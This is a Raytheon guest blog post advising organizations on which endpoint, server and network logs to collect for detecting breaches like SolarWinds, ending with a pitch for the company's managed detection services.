Raytheon Guest Blog: Ensuring your Organization's Cybersecurity is Protected
Let’s be real: almost no one could have or did detect that the Solarwinds software had been modified to do malicious things and provide entry points into an organizations’ networks. As with most breaches, the earlier you can detect it the better. If organizations can’t outright prevent it, then their only recourse is detection.
The question becomes, “What is needed for detection?” Visibility is key. In the security world, everyone talks about log collection. The default has been to collect all the logs from everywhere and keep them for as long as possible. The reality is that isn’t needed.
Through our work as a Managed Detection and Response/Managed Security Service Provider, we believe that targeting the most useful logs is key to detection. How do we know a log is useful? We tie it to a use case that is a well-known “Tactic, Techniques and Procedures” of the adversary that is most likely to attack your org. Performing a threat assessment and then tying the threat back to the MITRE ATT&CK framework is a great place to start. Our experience has shown that the follow types of log sources are best suited for detection and apply to the most widespread use cases.
Endpoint Logs: Whether it’s an Endpoint Detection and Response tool or something like Sysmon, knowing what is going on at an endpoint is critical in terms of early detection. If a user clicks on a link from a phishing email that downloads a file that then runs a Powershell command, the ability to collect and alert on that type of activity could be the difference between a company being compromised or not.
For critical systems and servers like AD servers, application servers or even file servers that store company critical data for an organization, you will want to collect the application, operating system event and security logs.
Network logs: Network logs are an important set of logs to collect. A sophisticated adversary may tamper (delete, overwrite, modify) with the logs at the endpoint. Network logs can help fill in the blanks of what activity happened. Typically network based logs are harder to tamper with so their veracity is higher. Netflow, firewall and proxy logs are great evidence to collect and provide insights that aren’t available at the endpoints. If an organization has a large network with multiple locations or WAN connections, then capturing intra-network traffic can be very useful in helping to detect lateral movement in a large network. If the organization can afford it, capturing network packets (PCAP) is the gold standard for network forensics. However, because this makes a copy of every packet on the network, they are usually limited in how long the data can be captured and stored .
Outsourcing cyber services may be the best strategy for providing a competitive advantage to optimize enterprise cyber security. Raytheon Intelligence & Space has more than a decade of experience as a MDR/MSSP provider helping protect commercial and government customers in all manner of cyber threats. As part of RI&S’ service delivery we provide the top 10-12 log /data sources critical to enabling our service. Our advanced analytics platform coupled with highly skilled threat analysts leverages the most useful data to detect, inform and protect organizations large and small.
Raytheon Cyber Services